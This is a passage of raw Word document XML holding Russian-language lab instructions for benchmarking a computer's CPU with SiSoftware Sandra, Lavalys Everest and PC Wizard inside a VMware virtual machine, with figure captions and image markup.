        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>- Lavalys Everest;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="a"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>- PC Wizard.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SiSoftware Sandra - программа позволяет получить информацию об аппаратных компонентах и программном обеспечении компьютера, а также протестировать производительность оборудования с помощью специализированных информационных и диагностических программ, позволяющих определить характеристики процессора, чипсета, памяти, дисков, видеоадаптера, портов, принтеров, сети, звуковой карты и других составляющих компьютерной системы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>EVEREST или AIDA64 - программа представляет собой мощный программно - диагностический комплекс для идентификации и тестирования</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> практически всех компонентов компьютера. Предоставляет детальные сведения обо всем аппаратном и программном обеспечении, кроме того, при помощи встроенных модулей для тестирования и калибровки можно провести дополнительную проверку отдельных подсистем. Имеет широкие возможности по представлению максимально полной и подробной информации об аппаратном и программном обеспечении компьютера. Содержит вспомогательные модули, мониторинговые функции, включает различные бенчмарки и тесты производительности.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>PC Wizard - программа, которая предоставляет обширную информацию обо всех установленных на компьютере компонентах: память, материнская плата, устройства для хранения и записи информации, видеоподсистема, сетевые устройства, модемы, принтеры и т.д., включая разнообразные данные об операционной системе - версию системы, установленные шрифты, библиотеки, WinSock, активные процессы, имеющиеся модули и сервисы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="af5"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ход работы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Для выполнения лабораторной работы необходимо скачать и запустить виртуальную машину. Она находится в папке \</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cesir</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vm</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>\ОЭВМиВС\.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Виртуальную машину необходимо скачать на компьютер. Запустить </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Vmware</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>player</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> на рабочем столе, выполнить команду открыть виртуальную машину и указать местоположения сохраненной машины, затем нажать </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>play</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1 Тестирование процессора</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1.1 Арифметический тест процессора</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Позволяет оценить производительность выполнения арифметических вычислений и операций с плавающей запятой.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">1.1.1 Тестирование при помощи </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>программы</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SiSoft</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sandra</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Во время тестирования устройства работают в предельных режимах. Некоторые из них могут вызвать сбой, если у них есть неисправности.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Вычисляется: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="a"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>- «</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Whetstone</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FPU</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>» (ФЛОПС) — величина, показывающая, сколько операций с плавающей запятой в секунду выполняет данный процессор;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="a"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>- «</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Dhrystone</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ALU</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>» (ИПС)</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> — единица измерения быстродействия, равная одному миллиону инструкций в секунду, показывает, сколько миллионов инструкций в секунду выполняет процессор.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Запустите программу, и перейдите во вкладку «Эталонные тесты» (рис.1).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="15"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2191177" cy="1454400"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="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cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2191193" cy="1454411"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:solidFill>
                      <a:srgbClr val="FFFFFF"/>
                    </a:solidFill>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="af8"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Рисунок 1 – Тесты программы </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SiSoftware</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sandra</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Выберите арифметический тест процессора, запустите его и нажмите кнопку «Обновить» (</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5). По окончании теста на экран выводятся результаты тестируемого и эталонных процессоров (рис. 2).</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7"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2054550" cy="889251"/>
            <wp:effectExtent l="19050" t="0" r="2850" b="0"/>
            <wp:docPr id="5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3" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2054301" cy="889143"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:solidFill>
                      <a:srgbClr val="FFFFFF"/>
                    </a:solidFill>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="af8"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Рисунок 2 – Результаты арифметического теста процессора в </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SiSoftware</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sandra</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Для сохранения результатов нажмите на кнопку «База результатов» и выберите «Экспорт результатов» В появившемся окне выберите формат.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">1.1.2 Тестирование при помощи программы </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Lavalys</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Everest</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Вид главного окна программы представлен на рис. 3.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="af7"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1989750" cy="1508585"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="5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4" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1989675" cy="1508528"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:solidFill>
                      <a:srgbClr val="FFFFFF"/>
                    </a:solidFill>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="af7"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Рисунок 3 – Вид главного окна программы </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Lavalys</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Everest</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CPU Queen — тестирует производительность процессора в целочисленных операциях при решении классической «Задачи с ферзями».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Для арифметического теста процессора в меню программы выберите группу «Тест» и запустите тест «CPU Queen», нажав кнопку «Обновить». По окончанию теста программа выводит результат тестируемого и эталонных процессоров (рис. 4).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="af6"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
